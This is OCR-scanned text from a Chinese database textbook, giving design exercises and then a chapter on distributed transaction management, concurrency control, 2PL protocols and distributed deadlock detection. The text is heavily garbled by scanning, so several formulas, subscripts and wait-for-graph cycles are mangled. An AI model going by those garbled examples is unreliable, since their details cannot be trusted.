Department 包含 部 门 的 详细 资料 并 使 用 deptNo 作为 关键 字 。managerNIN 用 来 确定 部 门 经 理 。 
每 个 部 门 只 有 一 个 经 理 。 
Project 包含 公司 项 目的 详细 资料 并 使 用 projNo 作为 关键 字 。projectManagerNIN 用 来 确定 项 
目 经 理 。 项 目的 deptNo 用 来 确定 负责 该 项 目的 部 门 。 
WorksOn 包含 员工 在 每 个 项 目 中 工时 数 的 详细 资料 ，( NIN，projNo) 作为 关键 字 。 
Business 包含 业务 领域 的 详细 资料 ，businessAreaNo 作为 关键 字 。 
Region 包含 地 区 的 详细 资料 ，regionNo 作为 关键 字 。 
按 地 区 对 部 门 进行 分 组 如 下 : 
地 区 1: Scotland ”地 区 2: Wales 地 区 3:; England 
所 需 的 业务 领域 包括 : 软件 工程 、 机 械 工程 以 及 电气 工程 。Wales 没有 软件 工程 部 门 ， 并 且 所 有 
的 电气 工程 部 门 都 在 England。 项 目的 人 事 安 排 由 本 地 部 门 决 定 。 
除了 按 地 区 分 布 数据 外 ， 还 要 求 能 通过 个 人 信息 〈 即 员工 信息 ) 或 通过 工作 相关 信息 ( 即 工资 表 ) 
来 访问 员工 数据 。 
24.15 ”为 该 系统 画 出 实体 联系 (ER) 图 。 
24.16 ”利用 习题 24.15 中 的 ER 图 为 该 系统 提出 一 个 分 布 式 数据 库 的 设计 方案 ， 必 须 包括 : 
(a) 合理 的 系统 分 段 方 案 。 
(b) 用 于 水 平分 段 的 最 小 谓词 集 。 
(c) 从 分 段 中 重 构 出 全 局 关系 。 
要 求 对 你 用 来 支持 该 设计 方案 的 假设 进行 说 明 。 
24.17 对 附录 A 中 的 DreamHome 案例 重复 习题 24.16。 
24.18 ”对 附录 B.2 中 的 EasyDrive School of Motoring 案例 重复 习题 24.16。 
24.19 ”对 附录 B.3 中 的 Wellmeadows 案例 重复 习题 24.16。 
24.20 在 24.5.1 节 中 讨论 命名 透明 性 时 ， 曾 经 假设 使 用 别名 来 唯一 确定 分 段 的 每 一 个 副本 。 给 出 实现 
该 命名 透明 性 方案 的 概要 设计 。 
24.21 选取 一 个 你 了 解 的 分 布 式 DBMS ， 与 Date 关于 DDBMS 的 12 条 规则 进行 比较 。 指 出 你 所 选 系 
统 与 这 些 规则 中 的 哪些 不 相符 合 ， 并 说 明 不 一 致 的 原因 。 
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| 本 章 目标 
本 章 我 们 主要 学 习 : 
e@ 数据 分 布 如 何 影响 事务 管理 协议 
@ 集中 式 并 发 控制 技术 如 何 扩展 用 来 处 理 数据 分 布 
e 当 涉 及 多 个 结 点 时 如 何 检测 死 锁 
@ 在 使 用 如 下 协议 的 分 布 环 境 中 如 何 恢复 数据 库 故障 : 
加 两 段 式 提交 (2PC ) 
田 三 段 式 提交 (3PC) 
分 布 环境 下 检测 和 维护 完整 性 的 困难 
X/Open DTP 标准 
分 布 式 查询 优化 
分 布 环境 中 半 连 操作 的 重要 性 
Oracle 如 何 处 理 数 据 分 布 


前 面 的 章节 中 已 经 讨论 了 与 分 布 式 数据 库 管理 系统 ( DDBMS) 相关 的 基本 概念 和 问题 。 
从 用 户 的 角度 看 ，DDBMS 提供 的 功能 是 非常 吸引 人 的 。 但 是 ， 从 实现 的 角度 看 ， 提 供 这 些 
功能 所 需 的 协议 和 算法 十 分 复杂 ， 并 且 可 能 导致 一 些 严重 的 问题 ， 从 而 抵消 了 这 种 技术 的 优 
势 。 本 章 将 继续 讨论 DDBMS 技术 ， 主 要 考虑 如 何 扩展 第 22 章 中 已 讨论 的 有 关 并 发 控制 、 
死 锁 管理 和 恢复 的 协议 ， 以 实现 对 数据 分 布 和 复制 的 支持 。 

还 有 一 种 相对 简单 的 方法 来 实现 数据 分 布 ， 即 使 用 一 台 复 制服 务 器 ， 由 这 台 服 务 器 控制 
远程 结 点 的 数据 副本 。 几 乎 所 有 的 数据 库 供应 商都 提供 了 各 自 的 复制 解决 方案 ， 而 且 还 有 许 
多 非 数据 库 供应 商 也 都 为 数据 复制 提供 了 可 选 解决 方案 。 下 章 将 考虑 如 何 用 复制 服务 器 作为 
DDBMS 的 一 种 替补 方案 。 


在 25.1 节 中 将 简要 回顾 分 布 式 事务 处 理 的 目标 。25.2 节 将 讨论 数据 分 布 如 何 影响 在 
22.2.2 节 已 给 出 的 串 行 性 的 定义 ， 然 后 讨论 在 分 布 式 环境 下 如 何 扩展 在 22.2.3 节 和 22.2.5 节 
中 提出 的 并 发 控制 协议 。25.3 节 研 究 在 DDBMS 中 识别 死 锁 的 复杂 性 ， 并 讨论 分 布 式 死 锁 检 
测 协议 。25.4 节 研 究 在 分 布 式 环境 中 可 能 出 现 的 故障 ， 并 且 讨 论 用 来 保证 分 布 式 事务 中 原子 
性 和 持久 性 的 协议 。25.5 节 简 要 介绍 X/Open 分 布 式 事务 处 理 模 型 ， 它 给 出 了 事务 处 理 的 程 
序 设计 接口 。25.6 节 概 述 了 分 布 查询 优化 ，25.7 节 简 要 介绍 Oracle 如 何 处 理 分 布 。 本 章 中 
的 例子 取 自 11.4 节 和 附录 A 中 的 DreamHome 案例 研究 。 
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25.1 分 布 式 事务 管理 


正如 24.5.2 节 所 述 ， 分布 式 事务 处 理 的 目标 与 集中 式 系统 一 样 ， 尽 管 为 了 保证 全 局 事务 
和 每 个 子 事务 的 原子 性 使 得 DDBMS 更 加 复杂 。 在 22.1.2 节 曾 定义 集中 式 DBMS 中 处 理事 
务 、 并 发 控制 和 恢复 的 四 个 高 层 数据 库 模 块 。 事 务 管理 器 (transaction manager) 的 作用 是 代 
表 应 用 程序 安排 事务 ， 它 主要 与 调度 器 ( scheduler) 通信 ， 调 度 器 负责 执行 特定 的 并 发 控制 
策略 。 调 度 器 的 目标 是 使 事务 的 并 发 程度 最 大 化 ， 同 时 避免 并 发 执行 事务 之 间 的 相互 影响 ， 
维护 数据 库 的 一 致 性 。 当 事务 出 现 故障 时 ， 恢 复 管 理 器 (recovery manager) 确保 数据 库 能 够 
重新 恢复 到 事务 开始 之 前 的 一 致 性 状态 ， 同 时 还 负责 在 系统 出 错时 将 数据 库 恢 复 到 一 致 的 状 
态 。 缓 冲 区 管理 器 (buffer manager) 负责 在 磁盘 存储 器 和 主 存 之 间 高 效 传输 数据 。 

在 分 布 式 DBMS 中 ， 这 些 模块 仍 存在 于 每 个 本 地 DBMS 中 。 此 外 ， 每 个 本 地 结 点 中 还 
应 有 一 个 全 局 事务 管理 器 ( global transaction manager) 或 事务 协调 器 ( transaction coordinator )， 
目的 是 协调 在 该 结 点 上 初始 化 的 全 局 事务 和 本 地 事务 的 执行 。 结 点 间 的 通信 仍然 是 由 数据 通 
信 组 件 来 完成 的 (不 同 结 点 的 事务 管理 器 之 间 不 直接 进行 通信 )。 

在 结 点 S1 初始 化 的 全 局 事务 的 执行 过 程 如 下 : 

e 结 点 S; 中 的 事务 协调 器 (TC ) 根据 全 局 系统 目录 中 的 信息 将 事务 分 为 若干 子 事务 。 

e 结 点 Si 中 的 数据 通信 组 件 将 子 事务 传 给 适当 的 结 点 ， 如 Ss 和 Si。 

e 结 点 S 和 S3 中 的 事务 协调 器 管理 这 些 子 事务 。 子 事务 的 结果 通过 数据 通信 组 件 传 回 

TCis 

图 25-1 中 给 出 此 执行 过 程 。 大 致 了 解 了 分 布 式 事务 管理 后 ， 下 面 讨 论 并 发 控制 、 死 锁 

管理 和 恢复 的 协议 。 
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图 25-1 分 布 式 事务 的 协调 


25.2 ”分布 式 并 发 控制 


本 节 将 介绍 在 分 布 式 DBMS 中 提供 并 发 控制 的 协议 。 首 先 来 研究 一 下 分 布 式 并 发 控制 
的 目标 。 


25.2.1 目标 


假设 系统 没 发 生 故 障 ， 整 个 并 发 控制 机 制 必须 保证 数据 项 的 一 致 性 以 及 每 个 原子 动作 
都 能 在 有 限 的 时 间 之 内 完成 。 除 此 之 外 ， 对 于 分 布 式 DBMS 来 说 ， 一 个 好 的 并 发 控制 机 制 
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对 于 结 点 和 通信 故障 有 弹性 。 
允许 并 行 以 满足 性 能 需求 。 
增加 的 计算 和 存储 开销 适度 。 
能 够 在 有 较 大 通信 延迟 的 网 络 环境 中 较 好 地 运行 。 
对 原子 动作 的 结构 几乎 不 加 限制 (Kohler，1981 )。 

在 22.2.1 节 中 曾 讨论 当 人 允许 多 个 用 户 并 发 访问 数据 库 时 可 能 出 现 的 几 种 问题 ， 比 如 ， 丢 
失修 改 、 未 提交 依赖 和 不 一 致 分 析 等 问题 。 这 些 问题 同样 也 存在 于 分 布 式 环境 中 ， 而 且 由 于 
数据 分 布 还 会 引发 其 他 一 些 问 题 ， 比 如 当 一 个 数据 项 在 多 个 结 点 上 复制 时 ， 多 副本 的 一 致 性 
就 是 一 个 新 问题 。 很 明显 ， 为 了 维护 全 局 数据 库 的 一 致 性 ， 当 其 中 一 个 结 点 中 的 副本 更 新 时 ， 
这 个 数据 项 的 所 有 其 他 副本 都 要 进行 更 新 。 只 要 其 中 有 一 个 副本 没有 及 时 更 新 ， 数 据 库 就 不 
一 致 了 。 在 本 节 中 假设 对 数据 项 副本 的 更 新 是 同步 执行 的 ， 并 且 已 封装 在 事务 内 部 。 第 26 章 
再 讨论 如 何 异 步 更 新 数据 副本 ， 即 在 更 新 源 数据 项 的 事务 完成 之 后 的 某 个 时 间 点 上 实现 整个 
数据 库 的 一 致 性 。 


25.2.2 分布 串 行 性 


在 22.2.2 节 曾 讨论 过 串 行 性 的 概念 ， 该 概念 在 分 布 式 环境 中 可 扩展 用 于 分 布 数据 。 如 果 
在 每 个 结 点 中 的 事务 调度 都 是 可 串 行 的 ， 并 且 所 有 本 地 串 行 序列 相同 ， 那 么 全 局 调度 (所 有 
本 地 调度 的 集合 ) 同样 也 是 可 串 行 的 。 这 要 求 所 有 的 子 事务 在 各 个 结 点 的 调度 中 以 相同 的 顺 
序 出 现 。 因 此 ， 如 果 T 在 结 点 S1 上 的 子 事务 表示 为 Ti， 就 必须 保证 如 果 Ti<T;， 则 有 : 

Ti<T ”对 于 所 有 的 结 点 S$:， 只 要 事务 T; 和 Tj 在 其 上 有 子 事务 

在 分 布 式 环境 中 解决 并 发 控制 主要 有 锁 和 时 间 戳 这 两 种 途径 ， 在 22.2 节 我 们 已 讨论 过 
它们 如 何 用 于 集中 式 系统 。 如 果 给 定 一 个 并 发 执行 的 事务 集合 ， 那 么 : 

e 加 锁 机 制 可 以 确保 并 发 执行 等 效 于 这 些 事 务 的 某 种 (不 可 预知 的 ) 串 行 执行 结果 。 

e 时 间 惟 机制 可 以 保证 事务 的 并 发 执行 等 效 于 这 些 事务 的 一 个 特定 串 行 执行 结果 ， 即 

按时 间 截 序列 。 

无 论 数据 库 是 集中 式 还 是 分 段 的 ， 只 要 不 复制 ， 每 个 数据 项 就 只 有 一 个 副本 ， 那 么 所 有 
事务 不 是 在 本 地 执行 就 是 在 某 一 个 远程 结 点 上 执行 ， 此 时 都 可 以 使 用 在 22.2 节 讨 论 的 协议 。 
但 当 数 据 被 复制 或 者 是 事务 所 涉及 的 数据 不 只 存在 于 一 个 结 点 上 时 ， 就 必须 对 这 些 协 议 进行 
扩展 。 另 外 ， 如 果 采 用 了 锁 协 议 ， 则 不 得 不 提供 处 理 死 锁 的 机 制 〈 参 见 22.2.4 节 )。 若 采用 
死 锁 检测 和 恢复 机 制 ， 则 不 仅仅 要 在 本 地 结 点 中 ， 还 要 求 在 全 局 层次 上 检查 死 锁 ， 因 为 在 全 
_ 局 层次 还 可 能 存在 多 个 结 点 间 的 组 合 死 锁 。 在 25.3 节 中 将 讨论 分 布 式 死 锁 。 


25.2.3” 锁 协议 

本 节 给 出 下 列 基于 二 段 锁 (2PL) 的 协议 ， 用 于 保证 分 布 式 DBMS 的 串 行 性 : 集中 式 
2PL、 主 备份 2PL、 分 布 式 2PL 和 多 数 锁 。 
集中 式 2PL 

在 集中 式 2PL 协议 中 ， 有 一 个 单独 的 结 点 来 维护 所 有 的 锁 消 息 (Alsberg and Day， 
1976 ; Garcia-Molina，1979 ) 。 整 个 分 布 式 DBMS 只 存在 一 个 调度 器 或 是 锁 管理 器 (lock 
manager) 用 来 加 锁 或 解锁 。 在 结 点 S11 上 初始 化 的 全 局 事务 的 集中 式 2PL 协议 实现 如 下 : 
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(1) 结 点 $1 的 事务 协调 器 依据 全 局 系统 目录 中 的 信息 ， 将 事务 分 为 几 个 子 事务 。 协 调 
器 负责 维护 数据 的 一 致 性 。 如 果 事 务 要 更 新 存在 备份 的 数据 项 ， 协 调 器 必须 保证 数据 项 的 所 
有 副本 都 被 更 新 。 因 此 ， 协 调 器 要 求 在 更 新 每 个 副本 之 前 加 锁 ， 然 后 解锁 。 协 调 器 可 以 读 取 
该 数据 项 的 任何 一 个 副本 ， 如 果 存 在 本 地 副本 的 话 ， 通 常 选择 本 地 结 点 的 副本 。 

(2 ) 全 局 事务 涉及 的 本 地 事务 管理 器 使 用 普通 的 二 段 锁 规则 ， 向 集中 式 锁 管 理 器 请 求 加 
锁 或 解锁 。 

(3 ) 集中 式 锁 管理 器 检查 某 数 据 项 的 加 锁 请 求 与 当前 锁 是 否 兼容 。 如 果 兼 容 ， 锁 管理 器 
向 申请 结 点 发 回 一 个 消息 确认 锁 已 产生 。 和 否则 ， 管 理 器 将 请 求 排队 直到 获得 锁 为 止 。 

该 方案 还 有 一 种 变形 ， 那 就 是 让 事务 协调 器 代表 本 地 事务 管理 器 发 出 所 有 锁 请 求 。 在 这 
种 情况 下 ， 锁 管理 器 仅仅 和 事务 协调 器 进行 交互 ， 而 不 和 每 个 本 地 事务 管理 器 交互 。 

集中 式 2PL 的 优点 是 实现 起 来 相对 简单 。 死 锁 检 测 的 复杂 度 与 集中 式 DBMS 相当 ， 因 
为 只 有 一 个 锁 管 理 器 维护 所 有 的 锁 消 息 。 在 分 布 式 DBMS 中 集中 式 2PL 的 缺点 就 是 产生 了 
瓶颈 ， 而 且 可 靠 性 低 。 由 于 所 有 的 加 锁 请 求 都 发 往 同 一 个 结 点 ， 这 个 结 点 就 可 能 变 成 一 个 瓶 
颈 。 由 于 中 心 结 点 的 故障 将 导致 大 部 分 系统 的 故障 ， 所 以 系统 的 可 靠 性 比较 低 。 但 是 ， 通 信 
成 本 相对 来 说 是 比较 低 的 。 例 如 ， 一 个 在 n 个 结 点 上 有 代理 ( 子 事务 ) 的 全 局 更 新 操作 仅 要 
求 向 集中 式 锁 管理 器 发 出 2n 十 3 条 消息 : 

e 1 条 请 求 加 锁 消 息 。 

e 1 条 锁 获 得 消息 。 

e n 条 更 新 消息 。 

。 nn 条 确认 消息 。 

。 1 条 解锁 请 求 。 

主 备份 2PL 

这 个 协议 试图 通过 将 锁 管 理 器 分 布 在 几 个 结 点 上 来 克服 集中 式 2PL 的 缺点 。 每 个 锁 管 
理 器 负责 管理 一 组 数据 项 的 锁定 。 对 于 数据 项 的 副本 ， 选 择 其 中 之 一 作为 主 备份 ， 其 他 的 备 
份 称 为 从 备份 。 将 哪个 结 点 选 作 主 结 点 是 灵活 的 ， 并 且 被 选 定 管理 主 备份 锁 的 结 点 并 不 需要 
保存 数据 的 主 备份 (Stonebraker and Neuhold，1977 ) 。 

这 个 协议 是 集中 式 2PL 的 简单 扩展 。 主 要 的 区 别 是 在 数据 项 需要 更 新 的 时 候 ， 事 务 协 
调 器 必须 确定 主 备份 的 位 置 ， 目 的 是 向 恰当 的 锁 管 理 器 发 送 加 锁 请 求 。 当 数据 需要 进行 更 新 
时 只 有 其 主 备 份 需要 锁定 。 一 旦 主 备份 更 新 完成 ， 更 新 消息 向 从 备份 传播 。 传 播 应 当 尽 快 完 
成 以 防止 其 他 事务 拿 到 过 期 的 数据 值 。 但 是 ， 并 不 必 将 更 新 作为 一 个 原子 动作 。 本 协议 仅仅 
保证 主 备份 是 当前 最 新 的 。 

当 数 据 采 用 有 选择 复制 策略 并 且 更 新 不 频繁 ， 而 结 点 并 不 需要 总 是 最 新 数据 时 ， 就 可 以 
使 用 这 个 方法 。 这 种 方法 的 缺点 就 是 由 于 存在 多 个 锁 管理 器 ， 死 锁 的 处 理 比较 复杂 ， 而 且 系 
统 中 仍然 存在 一 定 程度 的 集中 性 : 特定 主 备份 的 锁定 请 求 只 能 由 唯一 的 一 个 结 点 处 理 。 后 一 
个 缺点 可 以 通过 允许 备份 结 点 持 有 加 锁 信 息 来 部 分 克服 。 这 个 方法 比 集中 式 2PL 通信 成 本 
更 少 ， 执 行 效率 更 高 ， 因 为 减少 了 远程 加 锁 。 


分 布 式 2PL 


这 个 协议 也 试图 克服 集中 式 2PL 的 缺点 ， 不 同 的 是 分 布 式 2PL 是 通过 将 锁 管 理 器 分 布 
到 每 个 结 点 上 实现 的 。 每 个 锁 管 理 器 都 负责 管理 其 所 在 结 点 上 数据 的 锁定 。 如 果 数 据 没 有 被 
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复制 ， 这 个 协议 和 主 备份 2PL 协议 是 等 效 的 。 否 则 ， 分 布 式 2PL 使 用 Read-One-Write-All 
(ROWA) 复制 控制 协议 。 也 就 是 所 有 数据 项 的 副本 都 能 够 提供 读 操作 ,但 是 所 有 的 副本 在 数 
据 项 更 新 之 前 都 必须 执行 加 锁 操作 。 这 个 方案 使 用 非 集中 式 的 方法 来 处 理 锁定 ， 从 而 避免 了 
集中 式 控制 的 缺点 。 但 是 ， 这 种 方法 的 缺点 是 存在 多 个 锁 管 理 器 ， 死 锁 的 处 理 比 较 复杂 ,并 
且 由 于 所 有 的 数据 更 新 之 前 都 必须 加 锁 ， 所 以 通信 成 本 比 主 备份 2PL 高 。 在 这 个 协议 中 有 7 
个 结 点 代理 的 全 局 性 更 新 操作 可 能 需要 至 少 5n 条 消息 : 
n 条 请 求 加 锁 消息 。 
n 条 锁 获 得 消息 。 
n 条 更 新 消息 。 
n 条 确认 消息 。 

e n 条 解锁 请 求 。 

如 果 忽 略 解锁 请 求 而 由 最 终 提交 操作 处 理 ， 那 么 只 需要 4n 条 消息 。 分 布 式 2PL 在 
System R* 中 使 用 (Mohan 等 人 ，1986 )。 
多 数 锁 

这 个 协议 是 分 布 式 2PL 的 扩展 ， 目 的 是 为 了 克服 在 更 新 之 前 必须 对 所 有 的 复制 备份 加 
锁 的 缺点 。 同 样 ， 系 统 在 每 个 结 点 上 维护 一 个 锁 管理 器 来 管理 该 结 点 上 所 有 数据 的 锁定 。 当 
一 个 事务 想 要 对 n 个 结 点 上 的 数据 项 副本 进行 读 操 作 或 是 写 操作 时 ， 就 必须 向 存储 了 该 数据 
项 的 个 结 点 中 一 半 以 上 的 结 点 发 出 加 锁 请 求 。 直 到 该 事务 获得 对 多 数 副 本 的 加 锁 消 息 才 能 
够 进行 下 去 。 如 果 该 事务 没有 在 一 定 的 时 间 段 内 收 到 大 多 数 副 本 的 锁定 消息 ， 将 会 撤销 请 求 
并 且 通 知 所 有 的 结 点 撤销 。 如 果 该 事务 得 到 了 足够 多 的 加 锁 消 息 ， 将 通知 所 有 的 结 点 已 经 加 
锁 。 任 意 多 个 事务 可 以 同时 在 多 数 副 本 中 拥有 共享 锁 , 但 只 有 单个 事务 能 够 在 多 副本 中 拥有 
互 斥 锁 (Thomas，1979 )。 

同样 ， 这 个 方案 也 避免 了 集中 式 控制 的 缺点 。 这 个 协议 的 缺点 是 复杂 性 增 大 ， 死 锁 检 
测 更 加 复杂 ， 对 于 锁定 请 求 至 少 需要 [(n+1)/2] 条 消息 ， 对 于 解锁 请 求 至 少 需要 [(n+1)/2] 条 
消息 。 这 种 技术 可 行 ， 但 对 共享 锁 来 说 要 求 过 强 。 为 保证 正确 性 只 要 求 对 单个 数据 项 副本 ， 
也 就 是 正在 进行 读 操 作 的 那个 数据 项 副本 进行 加 锁 ， 但 这 个 技术 却 要 求 对 大 多 数 副本 都 加 
上 锁 。 


25.3 分布 式 死 锁 管理 


在 22.2.4 节 中 曾 讨论 过 ,任何 基于 锁 的 并 发 控制 算法 (以 及 某 些 需要 事务 等 待 的 时 间 戳 
算法 ) 都 可 能 导致 死 锁 。 在 分 布 式 环境 中 ， 如 果 锁 管理 器 不 是 集中 式 的 ， 那 么 死 锁 检测 将 更 
加 复杂 ， 如 例 25.1 所 示 。 


| 例 25.1 办 分 布 式 死 锁 

考虑 三 个 事务 Ti，T2 和 Ta3， 其 中 : 

e Ti 在 结 点 S1 上 初始 化 并 且 在 结 点 S; 上 创建 了 一 个 代理 。 

e T: 在 结 点 S; 上 初始 化 并 且 在 结 点 Ss 上 创建 了 一 个 代理 。 

e T3 在 结 点 S; 上 初始 化 并 且 在 结 点 S1 上 创建 了 一 个 代理 。 

事务 如 例 中 所 示 设 置 共 享 ( 读 ) 锁 和 独占 ( 写 ) 锁 ， 其 中 read_lock ( T;，x%j) 表示 事务 Ti 
在 数据 项 x 上 的 持 有 共享 锁 ，write lock (T;:，xj) 表示 事务 Ti 在 数据 项 x; 上 持 有 独占 锁 。 












read lock (Ti，xl ) write_ lock (T», y;) 
write _ lock (Ti，yi) write_lock (Tz，zZ2 ) 
write lock (T3, x1) write _ lock (Ti，y2 ) 


可 以 为 每 个 结 点 创建 等 待 图 ( Wait-For Graph，WFG)， 如 图 25-2 所 示 。 在 每 个 单独 
的 WFG 中 没有 环 ， 这 可 能 会 误 认为 不 存在 死 锁 。 但 是 ， 如 果 将 这 些 WFG 结合 在 起 来 ， 
如 图 25-3 所 示 ， 可 以 看 到 存在 环 : 
四 让 


图 25-2 结 点 S1 、S2 和 S3 上 的 等 待 图 





read lock (T3, Zz3) 












write lock (T;, z3) 


所 以 存在 死 锁 。 





图 25-3 将 结 点 S1、S2 和 S3 上 的 等 待 图 结合 在 一 起 《《 


例 25.1 说 明了 在 DDBMS 中 只 为 每 个 结 点 创建 本 地 WFG 来 检测 死 锁 是 不 够 的 ， 还 需 
要 将 所 有 本 地 WFG 合并 得 到 全 局 WFG。 在 DDBMS 中 通常 有 三 种 方法 检测 死 锁 : 集中 式 、 
分 层 式 和 分 布 式 死 锁 检 测 。 
集中 式 死 锁 检 测 

在 集中 式 死 锁 检 测 中 ， 其 中 某 个 结 点 被 指定 为 死 锁 检测 协调 器 ( Deadlock Detection 
Coordinator，DDC)。DDC 负责 创建 和 维护 全 局 WFG。 每 个 锁 管 理 器 定期 地 向 DDC 提交 本 
地 WFG。DDC 创建 全 局 WFG 并 且 检 测 其 中 是 否 存在 环 。 如 果 存 在 环 ，DDC 将 会 回 滚 一 些 
事务 并 重启 它们 来 打破 环 。DDC 必须 通知 到 所 有 涉及 这 些 事务 处 理 的 结 点 ， 这 些 事务 将 回 
滚 并 重启 。 

为 了 减少 数据 发 送 量 ， 锁 管理 器 每 次 只 需要 发 送 在 最 近 一 次 发 送 消 息 后 ， 本 地 WFG 中 
改变 的 部 分 。 这 些 变化 反映 在 全 局 WFG 中 将 会 添加 或 删除 一 些 边 。 这 种 集中 式 方 法 的 缺点 
是 系统 的 可 靠 性 低 ， 因 为 中 心 结 点 的 故障 将 引发 全 系统 的 问题 。 

分 层 式 死 锁 检 测 

在 分 层 式 死 锁 检测 中 ， 网 络 上 的 结 点 分 层 组 织 。 每 个 结 点 将 本 地 的 WFG 向 上 一 层 的 死 
锁 检 测 结 点 发 送 (Menasce and Muntz, 1979 ) 。 图 25-4 给 出 了 8 个 结 点 S 到 Ss 的 层次 结构 。 
第 一 层 叶 结 点 就 是 结 点 本 身 ， 进 行 本 地 死 锁 检测 。 第 二 层 结 点 DDy 检测 相 邻 结 点 i 和 jj 之 间 
的 死 锁 。 第 三 层 结 点 检测 相 邻 的 4 个 结 点 之 间 的 死 锁 。 树 的 根 结 点 是 全 局 死 锁 检 测 器 ， 例 
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如 ， 用 来 检测 结 点 $1 到 Ss 的 死 锁 


Level 
4 





图 25-4 分 层 式 死 锁 检测 


分 层 式 检测 方法 减少 了 对 集中 检测 结 点 的 依赖 ， 从 而 减少 了 通信 成 本 。 但 是 实现 起 来 更 
加 复杂 ， 特 别 当 存在 结 点 和 通信 故障 的 时 候 。 
分 布 式 死 锁 检测 

关于 分 布 式 死 锁 检测 存在 多 种 算法 ， 在 这 里 考虑 由 Obermarck ( 1982 ) 提出 的 最 有 名 的 
一 种 。 这 种 方法 中 ， 在 本 地 WFG 中 添加 一 个 外 部 结 点 Tw 用 来 指示 远程 结 点 的 代理 。 当 在 
结 点 $1 的 事务 Ti 在 另外 一 个 结 点 $: 创建 一 个 代理 时 ， 那 么 在 本 地 WFG 中 就 添加 一 条 从 Ti 
到 Tow 结 点 的 边 。 同 样 ， 在 结 点 S; 的 本 地 WFG 中 将 添加 从 Tax 结 点 到 T1 代理 的 边 。 

例如 ， 图 25-3 所 示 的 全 局 WFG 可 以 由 图 25-5 中 结 点 Si1/、S2 和 ;的 本 地 WFG 来 表 
示 。 在 本 地 WFG 中 连接 代理 和 Te 的 边 用 所 涉及 的 结 点 标示 。 例 如 ， 在 Si 结 点 上 连接 Ti 
和 Text 结 点 的 边 用 S; 标示 ， 这 条 边 就 表示 事务 Ti 在 结 点 $;, 上 创建 了 一 个 代理 。 





S3 


图 25-5 分 布 式 死 锁 检测 


如 果 本 地 WFG 中 有 不 包含 Tox 结 点 的 环 ， 那 么 这 个 结 点 和 DDBMS 就 存在 死 锁 。 如 果 
本 地 WFG 中 有 包含 Text 结 点 的 环 ， 那 么 就 有 潜在 全 局 死 锁 的 可 能 。 但 是 ， 存 在 这 样 的 环 并 
不 一 定 存在 全 局 死 锁 ， 因 为 Ton 结 点 可 能 代表 了 不 同 的 代理 ， 当 然 如 果 存 在 死 锁 的 话 ，WFG 
中 一 定 有 这 样 的 环 存在 。 为 了 判定 是 否 真 的 存在 死 锁 ， 必 须 对 图 形 进 行 合 并 。 如 果 结 点 Si 
有 一 个 潜在 的 死 锁 ， 那 么 其 本 地 WFG 一 定 具 有 下 面 的 形式 : 

eb a 

为 了 避免 结 点 之 间 相 互 发 送 WFG， 可 使 用 一 种 简单 的 策略 ， 即 给 每 个 事务 分 配 一 个 时 

间 惟 并 且 强 制 如 果 ts(TDJ<ts(TDO， 结 点 S 只 向 事务 Ti 正在 等 待 的 结 点 ， 比 如 说 St 发 送 其 


WFG。 如 果 假 定 ts(Ti)<ts(Ti)， 为 了 检测 死 锁 ， 结 点 S1 将 其 WFG 发 送 给 结 点 St。 结 点 
St 就 可 以 添加 这 部 分 消息 到 本 地 WFG 中 ,并且 检查 扩展 图 中 是 否 有 不 包含 Tox 的 环 。 如 
果 还 没有 环 ， 这 个 过 程 继续 进行 下 去 直到 出 现 环 ， 这 时 一 个 或 几 个 事务 需要 回 滚 并 且 与 其 
所 有 代理 一 起 重新 启动 。 如 果 建 立 了 整个 全 局 WFG 后 仍 未 出 现 环 ， 此 时 可 以 断言 系统 中 
没有 死 锁 。Obermarck 已 经 证 明 ， 如 果 存 在 全 局 死 锁 ， 上 述 过 程 最 终 一 定 会 在 某 个 结 点 产 
生 环 。 
在 图 25-5 中 的 三 个 本 地 WFG 包含 了 如 下 的 环 : 
Si: To Ts TI Ton 
Si2: Teu 一 了 一 工 一 Te 
S3: Te 一 T> 一 了 T5 一 Ton 
在 这 个 例子 中 ， 结 点 $1 将 把 本 地 WFG 发 送 给 事务 Ti 正在 等 待 的 结 点 ， 也 就 是 结 点 
Sz。 结 点 $: 扩展 其 本 地 WFG 以 包含 这 一 部 分 消息 ， 变 成 如 下 形式 : 
Si: Ta Ta Ti Ts To 
这 仍然 只 说 明 包 含 潜在 的 死 锁 ， 再 将 该 WFG 发 送 给 事务 T2 正在 等 待 的 结 点 ， 也 就 是 
结 点 S3。 绪 点 53 的 WFG 扩展 为 : 
Sas Tee st Tar Ti Ls? Ts? To 
这 是 全 局 WFG 中 存在 的 一 个 不 包含 结 点 Tox 的 环 ， 因 此 可 以 得 出 存在 死 锁 的 结论 ， 并 
且 应 当 采 取 适 当 的 恢复 协议 。 分 布 式 死 锁 检 测 方法 比分 层 式 或 是 集中 式 方 法 更 加 强壮 ， 但 是 
单个 结 点 不 能 包含 检测 死 锁 所 需 的 全 部 消息 ， 从 而 需要 大 量 的 结 点 间 通 信 。 


25.4 分 布 式 数据 库 恢 复 
本 节 讨论 用 于 处 理 分 布 式 环境 中 各 种 故障 的 协议 。 


25.4.1 ”分布 式 环境 中 的 故障 


在 24.5.2 节 中 ， 叙述 过 分 布 式 DBMS 特有 的 四 种 故障 : 

。 丢失 消 息 。 

e 通信 链 路 故障 。 

e 结 点 故障 。 

e 网 络 分 区 。 

丢失 消息 ， 或 是 消息 顺序 错误 ， 一 般 是 由 底层 计算 机 网 络 协议 造成 的 。 因 此 ， 假 定 它们 
由 DDBMS 中 的 数据 通信 组 件 透明 地 处 理 ， 下 面 将 集中 考虑 其 他 几 类 故障 。 

一 个 DDBMS 能 否 工 作 强 烈 地 依赖 于 网 络 上 所 有 结 点 相互 之 间 能 否 可 靠 地 通信 。 过 去 ， 
通信 并 不 总 是 可 靠 的 。 时 至 今日 ， 虽 然 网 络 技术 已 经 得 到 突飞猛进 的 发 展 ， 网 络 的 可 靠 性 得 
到 很 大 提高 ， 但 是 仍然 可 能 发 生 通信 和 故障。 尤其 是 当 网 络 被 分 区 成 两 个 或 者 多 个 部 分 时 ， 虽 
然 处 于 同一 部 分 之 中 的 结 点 相互 之 间 仍 然 可 以 通信 ， 但 是 处 于 不 同 部 分 的 结 点 之 间 就 无 法 通 
信 了 。 图 25-6 给 出 了 网 络 分 区 的 例子 ， 由 于 结 点 S1 一 S: 之 间 的 连接 故障 ， 结 点 (Si，S4， 
Ss ) 和 结 点 (S，,，S; ) 被 分 区 开 来 。 

在 某 些 情况 下 ， 很 难 区 分 是 通信 和 链 路 故障 还 是 结 点 发 生 了 故障 。 例 如 ， 假 定 在 一 定时 间 
内 (超时 ) 结 点 Si 与 结 点 5S; 不 能 进行 通信 ， 那 么 可 能 是 因为 : 

